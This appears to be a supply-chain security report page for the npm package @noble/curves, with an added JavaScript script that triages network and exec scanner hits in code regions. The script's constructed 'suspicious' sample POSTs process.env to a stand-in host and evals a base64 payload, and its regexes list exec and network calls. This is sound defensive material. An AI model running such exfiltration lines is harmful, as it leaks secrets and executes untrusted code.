
@noble/curves

Audited & minimal JS implementation of elliptic curve cryptography

Versions: 48
License: MIT
Install scripts: No
Provenance: Verified

Supply chain provenance

Status for the latest visible version.

SLSA provenance attestation
npm registry signatures
gitHead linked

Maintainers

paulmillr

Keywords

cryptography, secp256k1, ed25519, p256, p384, p521, secp256r1, ed448, x25519, ed25519, bls12-381, bn254, alt_bn128, bls, noble, ecc, ecdsa, eddsa, oprf, schnorr, fft

Accepted risks

Findings the reviewer chose to accept rather than block on.

Source | Rule | Reason | Accepted by | When
source-diff | large-new-source-files | AI (source-diff): Noble-curves legitimately adds many new curve implementations (BLS12-381, ed448, p192, p224, p384, p521, pasta, stark, jubjub, etc.) as the library expands; large file counts are expected for this package. | ai |
publish-pattern | new-deps-added | AI (publish-pattern): @noble/hashes is Paul Miller's own companion library in the noble suite; adding it as a runtime dep is expected and not a supply-chain risk for this package. | ai |
source-diff | source-size-tripled | AI (source-diff): Size growth reflects legitimate expansion of curve implementations (especially BLS12-381, ~54KB each for CJS/ESM). Expected for a growing cryptography library. | ai |
source-diff | net-exec-file:src/abstract/oprf.ts | AI (source-diff): Legitimate RFC 9497 OPRF cryptographic implementation; URLs are documentation references, not network calls or dynamic execution. | ai |
source-diff | net-exec-file:abstract/oprf.d.ts | AI (source-diff): OPRF type definition file; URL references are RFC documentation links, not network calls. No actual dynamic code execution present. | ai |
source-diff | net-exec-file:abstract/frost.js | AI (source-diff): FROST is a legitimate RFC 9591 threshold signature protocol implementation. 'Network' references are protocol semantics, not actual network I/O. No HTTP/fetch calls present in the sample. | ai |
provenance | publisher-changed | AI (provenance): paulmillr migrated to GitHub Actions CI/CD publishing with SLSA provenance attestation. This is a supply chain improvement, not a compromise. Stable for this package going forward. | ai |
publish-pattern | dormant-publish | AI (publish-pattern): Dormancy explained by major feature development (FROST threshold signatures) and CI/CD migration. SLSA provenance confirms legitimate publish pipeline. | ai |
source-diff | net-exec-file:src/abstract/frost.ts | AI (source-diff): TypeScript source for FROST RFC 9591 implementation. Same false positive as the compiled JS: no actual network calls or dynamic code execution present. | ai |
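Four of the accepted risks are `net-exec-file` hits on the OPRF and FROST sources, accepted because the flagged URLs are RFC references in comments and strings rather than calls. The triage that justifies that acceptance can be automated. The script below is an added example, not the scanner's rule and not @noble/curves code: it splits a JS/TS file into code, comment and string regions and only counts network or dynamic-execution calls that occur in code. The regexes are heuristics (a regex literal containing a quote can confuse the region splitter), and both input files are CONSTRUCTED stand-ins, not the real oprf.ts or frost.ts.

```javascript
// Added example, not the scanner's rule nor @noble/curves code: triage a
// "net-exec-file" hit by separating URL literals that sit in comments or
// strings from real network or dynamic-execution calls in code. Heuristic
// regexes, not a parser. Both inputs below are CONSTRUCTED stand-ins.
const URL_RE = /https?:\/\/[^\s"'`)]+/g;
const NETWORK_CALL = /\b(?:fetch|new\s+XMLHttpRequest|new\s+WebSocket|https?\.(?:request|get)|net\.connect)\s*\(/g;
const DYNAMIC_EXEC = /\b(?:eval|new\s+Function|execSync|execFileSync|execFile|spawnSync|spawn)\s*\(/g;

// Split source into code, comment and string regions with a small state machine.
function splitRegions(src) {
  const out = [];
  let i = 0, start = 0, state = 'code';
  const push = (end, kind) => {
    if (end > start) out.push({ kind, text: src.slice(start, end), offset: start });
    start = end;
  };
  while (i < src.length) {
    const c = src[i], n = src[i + 1];
    if (state === 'code') {
      if (c === '/' && n === '/') { push(i, 'code'); state = 'line'; i += 2; }
      else if (c === '/' && n === '*') { push(i, 'code'); state = 'block'; i += 2; }
      else if (c === '"' || c === "'" || c === '`') { push(i, 'code'); state = c; i += 1; }
      else i += 1;
    } else if (state === 'line') {
      if (c === '\n') { push(i, 'comment'); state = 'code'; }
      i += 1;
    } else if (state === 'block') {
      if (c === '*' && n === '/') { i += 2; push(i, 'comment'); state = 'code'; } else i += 1;
    } else {                              // inside a string; `state` holds the opening quote
      if (c === '\\') i += 2;
      else if (c === state) { i += 1; push(i, 'string'); state = 'code'; }
      else i += 1;
    }
  }
  push(src.length, state === 'code' ? 'code' : (state === 'line' || state === 'block') ? 'comment' : 'string');
  return out;
}

function triageNetExec(src) {
  const lineOf = (region, m) => src.slice(0, region.offset + m.index).split('\n').length;
  const result = { urls: [], networkCalls: [], dynamicExec: [] };
  for (const r of splitRegions(src)) {
    for (const m of r.text.matchAll(URL_RE)) result.urls.push({ url: m[0], in: r.kind, line: lineOf(r, m) });
    if (r.kind !== 'code') continue;      // only code regions can call anything
    for (const m of r.text.matchAll(NETWORK_CALL))
      result.networkCalls.push({ call: m[0].replace(/\s*\($/, ''), line: lineOf(r, m) });
    for (const m of r.text.matchAll(DYNAMIC_EXEC))
      result.dynamicExec.push({ call: m[0].replace(/\s*\($/, ''), line: lineOf(r, m) });
  }
  result.verdict = result.networkCalls.length + result.dynamicExec.length === 0
    ? 'false positive: URL references only'
    : 'needs review: live network or dynamic execution present';
  return result;
}

// Shaped like the accepted OPRF/FROST hits: RFC links in a comment and a string, no I/O.
const benignSource = `// OPRF, RFC 9497: https://www.rfc-editor.org/rfc/rfc9497
export function blind(input) { return hashToGroup(input); }
const spec = 'https://www.rfc-editor.org/rfc/rfc9591'; // FROST reference`;

// What a genuine hit looks like: the URL is actually used, and there is an eval.
const suspiciousSource = `const u = 'https://example.invalid/collect';
fetch(u, { method: 'POST', body: JSON.stringify(process.env) });
eval(Buffer.from(payload, 'base64').toString());`;

console.log(triageNetExec(benignSource).verdict);
console.log(triageNetExec(suspiciousSource));
```

The design choice is to never count a URL by itself: a URL only matters when a code region also contains something that could use it, which is exactly the distinction the reviewer drew for oprf.ts and frost.ts.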

Versions (showing 48 of 48)

Version Deps Published
2.2.0 1 / 5
2.0.1 1 / 5
2.0.0 1 / 5
1.9.7 1 / 7
1.9.6 1 / 7
1.9.5 1 / 7
1.9.4 1 / 7
1.9.3 1 / 7
1.9.2 1 / 7
1.9.1 1 / 6
1.9.0 1 / 6
1.8.2 1 / 6
1.8.1 1 / 6
1.7.0 1 / 6
1.6.0 1 / 6
1.5.0 1 / 6
1.4.2 1 / 6
1.4.1 1 / 6
1.4.0 1 / 5
1.3.0 1 / 5
1.2.0 1 / 5
1.1.0 1 / 5
1.0.0 1 / 5
0.9.1 1 / 8
0.9.0 1 / 8
0.8.3 1 / 8
0.8.2 1 / 8
0.8.1 1 / 8
0.8.0 1 / 8
0.7.3 1 / 8
0.7.2 1 / 8
0.7.1 1 / 8
0.7.0 1 / 8
0.6.4 1 / 9
0.6.3 1 / 9
0.6.2 1 / 11
0.6.1 1 / 11
0.6.0 1 / 11
0.5.2 1 / 11
0.5.1 1 / 11
0.5.0 1 / 11
0.4.0 0 / 6
0.3.2 1 / 10
0.3.1 1 / 10
0.3.0 1 / 10
0.2.1 0 / 6
0.2.0 0 / 6
0.1.0 0 / 6

Findings by version

Every version listed below carries the same single finding:

LOW: No provenance attestation (category: provenance)

Versions whose finding reads "Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.":
v0.9.1, v0.9.0, v0.8.3, v0.8.2, v0.8.1, v0.7.3, v0.7.2, v0.7.1, v0.7.0, v0.6.4, v0.6.3, v0.6.2, v0.6.0, v0.5.2, v0.5.1, v0.5.0

Versions whose finding reads "Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.":
v0.6.1, v0.4.0, v0.3.2, v0.3.1, v0.3.0, v0.2.1, v0.2.0, v0.1.0